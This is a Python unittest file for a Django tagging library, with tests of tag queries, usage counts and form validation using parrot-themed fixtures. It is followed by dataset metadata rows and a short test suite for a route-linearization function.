self.spamfoo = Tag.objects.get(namespace='spam', name='foo', value=None)
self.notassigned = Tag.objects.create(name='notassigned')
self.pining_for_the_fjords_parrot = Parrot.objects.get(state='pining for the fjords')
self.passed_on_parrot = Parrot.objects.get(state='passed on')
self.no_more_parrot = Parrot.objects.get(state='no more')
self.late_parrot = Parrot.objects.get(state='late')
def test_get_by_model_simple(self):
parrots = TaggedItem.objects.get_by_model(Parrot, self.foo)
self.assertEquals(len(parrots), 2)
self.failUnless(self.no_more_parrot in parrots)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
parrots = TaggedItem.objects.get_by_model(Parrot, self.bar)
self.assertEquals(len(parrots), 3)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
def test_get_by_model_intersection(self):
parrots = TaggedItem.objects.get_by_model(Parrot, [self.foo, self.baz])
self.assertEquals(len(parrots), 0)
parrots = TaggedItem.objects.get_by_model(Parrot, [self.foo, self.bar])
self.assertEquals(len(parrots), 1)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
parrots = TaggedItem.objects.get_by_model(Parrot, [self.bar, self.ter])
self.assertEquals(len(parrots), 2)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
# Issue 114 - Intersection with non-existant tags
parrots = TaggedItem.objects.get_intersection_by_model(Parrot, [])
self.assertEquals(len(parrots), 0)
def test_get_by_model_with_tag_querysets_as_input(self):
parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['foo', 'baz']))
self.assertEquals(len(parrots), 0)
parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['bar']))
self.assertEquals(len(parrots), 3)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.late_parrot in parrots)
parrots = TaggedItem.objects.get_by_model(Parrot, Tag.objects.filter(name__in=['bar', 'ter']))
self.assertEquals(len(parrots), 2)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
def test_get_by_model_with_strings_as_input(self):
parrots = TaggedItem.objects.get_by_model(Parrot, 'foo baz')
self.assertEquals(len(parrots), 0)
parrots = TaggedItem.objects.get_by_model(Parrot, 'bar')
self.assertEquals(len(parrots), 3)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.late_parrot in parrots)
parrots = TaggedItem.objects.get_by_model(Parrot, 'bar ter')
self.assertEquals(len(parrots), 2)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
def test_get_by_model_with_lists_of_strings_as_input(self):
parrots = TaggedItem.objects.get_by_model(Parrot, ['foo', 'baz'])
self.assertEquals(len(parrots), 0)
parrots = TaggedItem.objects.get_by_model(Parrot, ['bar'])
self.assertEquals(len(parrots), 3)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.late_parrot in parrots)
parrots = TaggedItem.objects.get_by_model(Parrot, ['bar', 'ter'])
self.assertEquals(len(parrots), 2)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
def test_get_by_nonexistent_tag(self):
# Issue 50 - Get by non-existent tag
parrots = TaggedItem.objects.get_by_model(Parrot, 'argatrons')
self.assertEquals(len(parrots), 0)
def test_get_union_by_model(self):
parrots = TaggedItem.objects.get_union_by_model(Parrot, ['foo', 'ter'])
self.assertEquals(len(parrots), 4)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.no_more_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
parrots = TaggedItem.objects.get_union_by_model(Parrot, ['bar', 'baz'])
self.assertEquals(len(parrots), 3)
self.failUnless(self.late_parrot in parrots)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.pining_for_the_fjords_parrot in parrots)
parrots = TaggedItem.objects.get_union_by_model(Parrot, ['spam:foo', 'baz'])
self.assertEquals(len(parrots), 2)
self.failUnless(self.passed_on_parrot in parrots)
self.failUnless(self.late_parrot in parrots)
parrots = TaggedItem.objects.get_union_by_model(Parrot, ['notassigned'])
self.assertEquals(len(parrots), 0)
# Issue 114 - Union with non-existant tags
parrots = TaggedItem.objects.get_union_by_model(Parrot, [])
self.assertEquals(len(parrots), 0)
class TestGetRelatedTaggedItems(TestCase):
def setUp(self):
self.l1 = Link.objects.create(name='link 1')
Tag.objects.update_tags(self.l1, 'tag1 tag2 tag3 tag4 tag5')
self.l2 = Link.objects.create(name='link 2')
Tag.objects.update_tags(self.l2, 'tag1 tag2 tag3')
self.l3 = Link.objects.create(name='link 3')
Tag.objects.update_tags(self.l3, 'tag1')
self.l4 = Link.objects.create(name='link 4')
self.a1 = Article.objects.create(name='article 1')
Tag.objects.update_tags(self.a1, 'tag1 tag2 tag3 tag4')
def test_get_related_objects_of_same_model(self):
related_objects = TaggedItem.objects.get_related(self.l1, Link)
self.assertEquals(len(related_objects), 2)
self.failUnless(self.l2 in related_objects)
self.failUnless(self.l3 in related_objects)
related_objects = TaggedItem.objects.get_related(self.l4, Link)
self.assertEquals(len(related_objects), 0)
def test_get_related_objects_of_same_model_limited_number_of_results(self):
# This fails on Oracle because it has no support for a 'LIMIT' clause.
# See http://asktom.oracle.com/pls/asktom/f?p=100:11:0::::P11_QUESTION_ID:127412348064
# ask for no more than 1 result
related_objects = TaggedItem.objects.get_related(self.l1, Link, num=1)
self.assertEquals(len(related_objects), 1)
self.failUnless(self.l2 in related_objects)
def test_get_related_objects_of_same_model_limit_related_items(self):
related_objects = TaggedItem.objects.get_related(self.l1, Link.objects.exclude(name='link 3'))
self.assertEquals(len(related_objects), 1)
self.failUnless(self.l2 in related_objects)
def test_get_related_objects_of_different_model(self):
related_objects = TaggedItem.objects.get_related(self.a1, Link)
self.assertEquals(len(related_objects), 3)
self.failUnless(self.l1 in related_objects)
self.failUnless(self.l2 in related_objects)
self.failUnless(self.l3 in related_objects)
Tag.objects.update_tags(self.a1, 'tag6')
related_objects = TaggedItem.objects.get_related(self.a1, Link)
self.assertEquals(len(related_objects), 0)
class TestTagUsageForQuerySet(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
def test_tag_usage_for_queryset(self):
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(state='no more'), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(state__startswith='p'), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=4), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'baz', 1) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__smelly=True), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 4)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__smelly=True), min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 2)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=4))
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', False) in relevant_attribute_list)
self.failUnless((u'baz', False) in relevant_attribute_list)
self.failUnless((u'foo', False) in relevant_attribute_list)
self.failUnless((u'ter', False) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(perch__size__gt=99))
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 0)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')), min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 1)
self.failUnless((u'bar', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.filter(Q(perch__size__gt=6) | Q(state__startswith='l')))
relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', False) in relevant_attribute_list)
self.failUnless((u'foo', False) in relevant_attribute_list)
self.failUnless((u'ter', False) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', False) in relevant_attribute_list)
self.failUnless((u'spam:foo', False) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(state='passed on'), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 5)
self.failUnless((u'bar', 2) in relevant_attribute_list)
self.failUnless((u'foo', 2) in relevant_attribute_list)
self.failUnless((u'ter', 2) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 2) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(state__startswith='p'), min_count=2)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 1)
self.failUnless((u'ter', 2) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(Q(perch__size__gt=6) | Q(perch__smelly=False)), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'foo', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:egg=ham', 1) in relevant_attribute_list)
tag_usage = Tag.objects.usage_for_queryset(Parrot.objects.exclude(perch__smelly=True).filter(state__startswith='l'), counts=True)
relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
self.assertEquals(len(relevant_attribute_list), 3)
self.failUnless((u'bar', 1) in relevant_attribute_list)
self.failUnless((u'ter', 1) in relevant_attribute_list)
self.failUnless((u'spam:foo', 1) in relevant_attribute_list)
################
# Model Fields #
################
class TestTagFieldInForms(TestCase):
def setUp(self):
self.original_max_tag_length = conf.MAX_TAG_LENGTH
self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
def tearDown(self):
conf.MAX_TAG_LENGTH = self.original_max_tag_length
conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
def test_tag_field_in_modelform(self):
# Ensure that automatically created forms use TagField
class TestForm(forms.ModelForm):
class Meta:
model = FormTest
form = TestForm()
self.assertEquals(form.fields['tags'].__class__.__name__, 'TagField')
def test_recreation_of_tag_list_string_representations(self):
plain = Tag.objects.create(name='plain')
spaces = Tag.objects.create(name='spa ces')
comma = Tag.objects.create(name='com,ma')
colon = Tag.objects.create(name='co:lon')
equal = Tag.objects.create(name='equa=l')
spaces_namespace = Tag.objects.create(name='foo', namespace='spa ces')
spaces_value = Tag.objects.create(name='foo', value='spa ces')
spaces_comma_namespace = Tag.objects.create(name='foo', namespace='spa ces,comma')
self.assertEquals(edit_string_for_tags([plain]), u'plain')
self.assertEquals(edit_string_for_tags([plain, spaces]), u'plain, spa ces')
self.assertEquals(edit_string_for_tags([plain, spaces, comma]), u'plain, spa ces, "com,ma"')
self.assertEquals(edit_string_for_tags([plain, comma]), u'plain "com,ma"')
self.assertEquals(edit_string_for_tags([comma, spaces]), u'"com,ma", spa ces')
self.assertEquals(edit_string_for_tags([plain, colon]), u'plain "co:lon"')
self.assertEquals(edit_string_for_tags([equal, colon]), u'"equa=l" "co:lon"')
self.assertEquals(edit_string_for_tags([equal, spaces, colon]), u'"equa=l", spa ces, "co:lon"')
self.assertEquals(edit_string_for_tags([plain, spaces_namespace]), u'plain, spa ces:foo')
self.assertEquals(edit_string_for_tags([plain, spaces_value]), u'plain, foo=spa ces')
self.assertEquals(edit_string_for_tags([plain, spaces_comma_namespace]), u'plain "spa ces,comma":foo')
self.assertEquals(edit_string_for_tags([plain], default_namespace='spa ces'),
u':plain')
self.assertEquals(edit_string_for_tags([spaces_namespace], default_namespace='spa ces'),
u'foo')
self.assertEquals(edit_string_for_tags([spaces_namespace, plain, spaces_comma_namespace], default_namespace='spa ces'),
u'foo :plain "spa ces,comma":foo')
def test_tag_d_validation(self):
t = TagField()
w50 = 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvb'
w51 = w50 + 'n'
w10 = w50[:10]
w11 = w50[:11]
conf.MAX_TAG_LENGTH = 150
conf.MAX_TAG_NAME_LENGTH = 50
conf.MAX_TAG_NAMESPACE_LENGTH = 50
conf.MAX_TAG_VALUE_LENGTH = 50
self.assertEquals(t.clean('foo'), u'foo')
self.assertEquals(t.clean('foo bar baz'), u'foo bar baz')
self.assertEquals(t.clean('foo,bar,baz'), u'foo,bar,baz')
self.assertEquals(t.clean('foo, bar, baz'), u'foo, bar, baz')
self.assertEquals(t.clean('foo %s bar' % w50),
u'foo %s bar' % w50)
self.assertEquals(t.clean('foo %s:%s=%s bar' % (w50, w50, w50)),
u'foo %s:%s=%s bar' % (w50, w50, w50))
try:
t.clean('foo %s bar' % w51)
except forms.ValidationError, ve:
self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s name may be no more than 50 characters long."]')
except Exception, e:
raise e
else:
raise self.failureException('a ValidationError exception was supposed to have been raised.')
try:
t.clean('foo %s:%s bar' % (w51, w50))
except forms.ValidationError, ve:
self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s namespace may be no more than 50 characters long."]')
except Exception, e:
raise e
else:
raise self.failureException('a ValidationError exception was supposed to have been raised.')
try:
t.clean('foo %s=%s bar' % (w50, w51))
except forms.ValidationError, ve:
self.assertEquals(unicode(list(ve.messages)), u'[u"Each tag\'s value may be no more than 50 characters long."]')
except Exception, e:
raise e
else:
raise self.failureException('a ValidationError exception was supposed to have been raised.')
conf.MAX_TAG_LENGTH = 149
try:
t.clean('foo %s:%s=%s bar' % (w50, w50, w50))
except forms.ValidationError, ve:
self.assertEquals(unicode(list(ve.messages)), u"[u'Each tag may be no more than 149 characters long.']")
except Exception, e:
raise e
else:
raise self.failureException('a ValidationError exception was supposed to have been raised.')
def test_tag_d_validation_with_non_string_input(self):
t = TagField()
self.assertEquals(t.clean(Tag(name='foo')), 'foo')
self.assertEquals(t.clean(Tag(name='foo', namespace='bar')), 'bar:foo')
self.assertEquals(t.clean(Tag(name='foo', namespace='bar:baz')), '"bar:baz":foo')
def test_tag_d_validation_with_empty_input(self):
t = TagField()
self.assertRaises(forms.ValidationError, t.clean, '')
t = TagField(required=False)
self.assertEquals(t.clean(''), '')
self.assertEquals(t.clean(None), '')
def test_tag_d_validation_with_default_namespace(self):
t = TagField(default_namespace='foo')
self.assertEquals(t.clean('bar'), 'bar')
conf.MAX_TAG_NAMESPACE_LENGTH = 10
t = TagField(default_namespace='qwertyuiop')
self.assertEquals(t.clean('bar'), 'bar')
t = TagField(default_namespace='qwertyuiopa')
self.assertRaises(forms.ValidationError, t.clean, 'bar')
#########
# Admin #
#########
class TestTagAdminForm(TestCase):
def setUp(self):
self.original_max_tag_length = conf.MAX_TAG_LENGTH
self.original_max_tag_name_length = conf.MAX_TAG_NAME_LENGTH
self.original_max_tag_namespace_length = conf.MAX_TAG_NAMESPACE_LENGTH
self.original_max_tag_value_length = conf.MAX_TAG_VALUE_LENGTH
def tearDown(self):
conf.MAX_TAG_LENGTH = self.original_max_tag_length
conf.MAX_TAG_NAME_LENGTH = self.original_max_tag_name_length
conf.MAX_TAG_NAMESPACE_LENGTH = self.original_max_tag_namespace_length
conf.MAX_TAG_VALUE_LENGTH = self.original_max_tag_value_length
def test_form_fields_validation(self):
w50 = 'qwertyuiopasdfghjklzxcvbnmqwertyuiopasdfghjklzxcvb'
w51 = w50 + 'n'
w30 = w50[:30]
w31 = w50[:31]
conf.MAX_TAG_LENGTH = 90
conf.MAX_TAG_NAME_LENGTH = 30
conf.MAX_TAG_NAMESPACE_LENGTH = 30
conf.MAX_TAG_VALUE_LENGTH = 30
tag_parts = {'name': None, 'namespace': None, 'value': None}
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 1)
self.assertEquals(len(f['name'].errors), 1)
tag_parts['name'] = w30
f = TagAdminForm(tag_parts)
self.failUnless(f.is_valid())
tag_parts['namespace'] = w30
f = TagAdminForm(tag_parts)
self.failUnless(f.is_valid())
tag_parts['namespace'] = w31
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 1)
self.assertEquals(len(f['namespace'].errors), 1)
tag_parts['name'] = None
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 2)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['namespace'].errors), 1)
tag_parts['name'] = w31
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 2)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['namespace'].errors), 1)
tag_parts['name'] = w30
tag_parts['namespace'] = w30
tag_parts['value'] = w30
f = TagAdminForm(tag_parts)
self.failUnless(f.is_valid())
tag_parts['name'] = None
tag_parts['namespace'] = None
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 1)
self.assertEquals(len(f['name'].errors), 1)
tag_parts['name'] = w31
tag_parts['namespace'] = w31
tag_parts['value'] = w31
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 3)
self.assertEquals(len(f['namespace'].errors), 1)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['value'].errors), 1)
conf.MAX_TAG_LENGTH = 89
tag_parts['name'] = w30
tag_parts['namespace'] = w30
tag_parts['value'] = w30
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 1)
self.assertEquals(len(f['namespace'].errors), 0)
self.assertEquals(len(f['name'].errors), 0)
self.assertEquals(len(f['value'].errors), 0)
self.assertEquals(len(f.non_field_errors()), 1)
# more than 50 chars are not allowed because the model fields
# cannot store longer values.
conf.MAX_TAG_LENGTH = 180
conf.MAX_TAG_NAMESPACE_LENGTH = 60
conf.MAX_TAG_NAME_LENGTH = 60
conf.MAX_TAG_VALUE_LENGTH = 60
tag_parts['name'] = w50
tag_parts['namespace'] = w50
tag_parts['value'] = w50
f = TagAdminForm(tag_parts)
self.failUnless(f.is_valid())
tag_parts['name'] = w51
tag_parts['namespace'] = w51
tag_parts['value'] = w51
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 3)
self.assertEquals(len(f['namespace'].errors), 1)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['value'].errors), 1)
self.assertEquals(len(f.non_field_errors()), 0)
def test_form_fields_validation_with_invalid_input(self):
tag_parts = {'namespace': None, 'name': 'foo', 'value': None}
f = TagAdminForm(tag_parts)
self.failUnless(f.is_valid())
tag_parts['name'] = '"'
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 1)
self.assertEquals(len(f['name'].errors), 1)
tag_parts['name'] = 'foo"bar'
tag_parts['namespace'] = 'foo"bar'
tag_parts['value'] = 'foo"bar'
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 3)
self.assertEquals(len(f['namespace'].errors), 1)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['value'].errors), 1)
tag_parts['name'] = '"foo"'
tag_parts['namespace'] = '"foo"'
tag_parts['value'] = '"foo"'
f = TagAdminForm(tag_parts)
self.failIf(f.is_valid())
self.assertEquals(len(f.errors), 3)
self.assertEquals(len(f['namespace'].errors), 1)
self.assertEquals(len(f['name'].errors), 1)
self.assertEquals(len(f['value'].errors), 1)
###########
# Generic #
###########
class TestFetchContentObjects(TestCase):
def setUp(self):
parrot_details = (
('pining for the fjords', 9, True, 'foo bar spam:egg=ham'),
('passed on', 6, False, 'bar baz ter'),
('no more', 4, True, 'foo ter spam:egg=ham'),
('late', 2, False, 'bar ter spam:foo'),
)
for state, perch_size, perch_smelly, tags in parrot_details:
perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
parrot = Parrot.objects.create(state=state, perch=perch)
Tag.objects.update_tags(parrot, tags)
article_details = (
('beatles comeback!', 'foo bar ter'),
('django gets a new pony', 'spam:foo spam:egg=ham'),
)
for name, tags in article_details:
article = Article.objects.create(name=name)
Tag.objects.update_tags(article, tags)
link_details = (
('example.com', 'baz ter'),
('lolcatz', 'baz'),
)
for name, tags in link_details:
link = Link.objects.create(name=name)
Tag.objects.update_tags(link, tags)
self.parrot_contenttype = ContentType.objects.get_for_model(Parrot)
self.article_contenttype = ContentType.objects.get_for_model(Article)
self.link_contenttype = ContentType.objects.get_for_model(Link)
def test_with_one_model(self):
queryset = TaggedItem.objects.filter(content_type=self.parrot_contenttype)
tagged_items = queryset
prefetched_items = queryset
fetch_content_objects(prefetched_items)
tagged_objects = [tagged_item.object for tagged_item in tagged_items]
prefetched_objects = [tagged_item.object for tagged_item in prefetched_items]
self.assertEquals(set(tagged_objects), set(prefetched_objects))
def test_select_related_for(self):
queryset = TaggedItem.objects.all()
tagged_items = queryset
prefetched_items = queryset
fetch_content_objects(prefetched_items, select_related_for=["parrot"])
tagged_objects = [tagged_item.object for tagged_item in tagged_items]
prefetched_objects = [tagged_item.object for tagged_item in prefetched_items]
self.assertEquals(set(tagged_objects), set(prefetched_objects))
def test_with_many_models(self):
queryset = TaggedItem.objects.all()
tagged_items = queryset
prefetched_items = queryset
fetch_content_objects(prefetched_items)
tagged_objects = [tagged_item.object for tagged_item in tagged_items]
prefetched_objects = [tagged_item.object for tagged_item in prefetched_items]
self.assertEquals(set(tagged_objects), set(prefetched_objects))
| 47.227927
| 153
| 0.640941
| 16,077
| 121,423
| 4.641351
| 0.032593
| 0.108927
| 0.071483
| 0.049317
| 0.887669
| 0.849663
| 0.815382
| 0.785484
| 0.750466
| 0.72708
| 0
| 0.013245
| 0.225863
| 121,423
| 2,570
| 154
| 47.246304
| 0.780591
| 0.013251
| 0
| 0.600376
| 0
| 0.001881
| 0.094929
| 0.001948
| 0
| 0
| 0
| 0
| 0.244946
| 0
| null | null | 0.013164
| 0.007052
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
217c8717dfde93c84dd723881a6af93563857926
| 141
|
py
|
Python
|
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
src/__init__.py
|
Jammy2211/Probabilistic_Programming_CDT
|
9d765dbc1aca38b20076a3e650f231f144c937d3
|
[
"MIT"
] | null | null | null |
from src import light_profiles as lp
from src import mass_profiles as mp
from src.galaxy import Galaxy
from src.analysis import Analysis
| 28.2
| 37
| 0.815603
| 24
| 141
| 4.708333
| 0.458333
| 0.247788
| 0.230089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 141
| 4
| 38
| 35.25
| 0.965812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2181b036139bf58359c345c56560c61416772fe6
| 2,204
|
py
|
Python
|
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
tests/test_route_linearization.py
|
jlieberherr/python-playground
|
6338b5878c0dba588768bd1c530add951420d858
|
[
"Unlicense"
] | null | null | null |
import unittest
from scripts.route_linearization import linearize_stops_in_multiple_routes
class RouteAggregationTest(unittest.TestCase):
def test_linearize_multiple_routes_trivial_graph(self):
sort_index_per_stop = linearize_stops_in_multiple_routes({1: set()})
self.assertEquals(sort_index_per_stop, {1: 1})
def test_linearize_multiple_routes_almost_trivial_graph(self):
sort_index_per_stop = linearize_stops_in_multiple_routes({1: {2}, 2: set()})
self.assertEquals(sort_index_per_stop, {1: 1, 2: 2})
def test_linearize_multiple_routes_non_trivial_graph(self):
sort_index_per_stop = linearize_stops_in_multiple_routes(
{1: {2}, 2: {3}, 3: {4, 7}, 4: set(), 5: {6}, 6: {2}, 7: set()}
)
self.assertTrue(sort_index_per_stop[2] > sort_index_per_stop[1])
self.assertTrue(sort_index_per_stop[6] == (sort_index_per_stop[5] + 1))
self.assertTrue(sort_index_per_stop[2] > sort_index_per_stop[6])
self.assertTrue(sort_index_per_stop[3] == (sort_index_per_stop[2] + 1))
self.assertTrue(sort_index_per_stop[4] > sort_index_per_stop[3])
self.assertTrue(sort_index_per_stop[7] > sort_index_per_stop[3])
def test_linearize_multiple_routes_non_trivial_graph_extended(self):
sort_index_per_stop = linearize_stops_in_multiple_routes(
{1: {2}, 2: {3}, 3: {4, 7}, 4: set(), 5: {6}, 6: {2}, 7: {9}, 8: {7}, 9: {10}, 10: set()}
)
self.assertTrue(sort_index_per_stop[2] > sort_index_per_stop[1])
self.assertTrue(sort_index_per_stop[6] == (sort_index_per_stop[5] + 1))
self.assertTrue(sort_index_per_stop[2] > sort_index_per_stop[6])
self.assertTrue(sort_index_per_stop[3] == (sort_index_per_stop[2] + 1))
self.assertTrue(sort_index_per_stop[4] > sort_index_per_stop[3])
self.assertTrue(sort_index_per_stop[7] > sort_index_per_stop[3])
self.assertTrue(sort_index_per_stop[7] > sort_index_per_stop[8])
self.assertTrue(sort_index_per_stop[9] == (sort_index_per_stop[7] + 1))
self.assertTrue(sort_index_per_stop[10] == (sort_index_per_stop[9] + 1))
if __name__ == '__main__':
unittest.main()
| 50.090909
| 101
| 0.700544
| 339
| 2,204
| 4.079646
| 0.123894
| 0.234273
| 0.312364
| 0.416486
| 0.898771
| 0.808388
| 0.786696
| 0.764281
| 0.707881
| 0.654375
| 0
| 0.044335
| 0.171053
| 2,204
| 43
| 102
| 51.255814
